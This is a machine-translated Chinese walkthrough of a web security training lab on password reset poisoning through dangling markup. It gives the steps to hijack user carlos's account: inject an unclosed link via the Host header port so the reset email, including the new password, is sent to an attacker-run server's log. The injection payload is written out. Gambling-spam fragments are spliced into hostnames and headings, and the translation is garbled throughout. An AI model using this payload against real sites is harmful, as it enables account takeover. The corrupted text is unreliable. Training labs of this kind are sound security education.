实验室:密码重置中毒通过悬挂标记
专家
该实验室容易通过密码重置中毒晃来晃去的标记。要解决实验室,请登录卡洛斯的帐户。
您可以使用以下凭据登录到自己的帐户:维纳:彼得
。发送到此帐户的任何电子邮件都可以通过Exploit服务器上的电子邮件客户端读取。
暗示
一些防病毒软件扫描电子邮件中的链接以确定它们是否是恶意的。
解决方案
- 转到登录页面并请求您自己帐户的密码重置。
- 转到Exploit服务器并打开电子邮件客户端以查找密码重置电子邮件。观察电子邮件中的链接只需指向通用登录页面,而URL不包含密码重置令牌。取而代之的是,直接在电子邮件正文文本中发送新密码。
- 在代理历史中,研究对
获取 /电子邮件
要求。观察您的电子邮件的HTML内容已写入字符串,但这是通过使用的dompurify
库在浏览器渲染之前。
- 在电子邮件客户端中,请注意,您可以选择将每个电子邮件视为RAW HTML。与电子邮件的渲染版本不同,这似乎没有以任何方式进行消毒。
发送帖子 /忘记 - 通信
请求打burp burp。观察到主机标头中使用域名篡改会导致服务器错误。但是,您可以在主机标题中添加任意的非数字端口,并且仍然正常地到达站点。发送此请求仍然会触发密码重置电子邮件:
主持人:您的lab-id.web-sbeplay体育能用吗ecurity-academy.net:arbitraryport
- 在电子邮件客户端中,检查电子邮件的原始版本。请注意,您的注入端口在链接内部反映为一个无用的单引号的字符串。稍后再进行新密码。
发送帖子 /忘记 - 通信
再次请求,但是这次使用端口突破字符串并注入指向您的exploit服务器的悬挂标记有效负载:
主机:您的lab-id.web-sebeplay体育能用吗curity-academy.net:'< a href =“ // your-exploit-server-id.web-security-academy.net/?
- 检查电子邮件客户端。您应该收到一封新电子邮件,其中大多数内容都缺少。转到Exploit服务器并检查访问日志。请注意,有一个请求的条目开始
获取 /? /登录'> […]
,其中包含电子邮件主体的其余部分,包括新密码。
- 在Burp Repeater中,最后一次发送请求,但请更改
用户名
参数为卡洛斯
。刷新访问日志,并从相应的日志条目中获取Carlos的新密码。
- 登录为
卡洛斯
使用此新密码解决实验室。
社区解决方案beplay维护得多久
迈克尔·索默(Michael Sommer)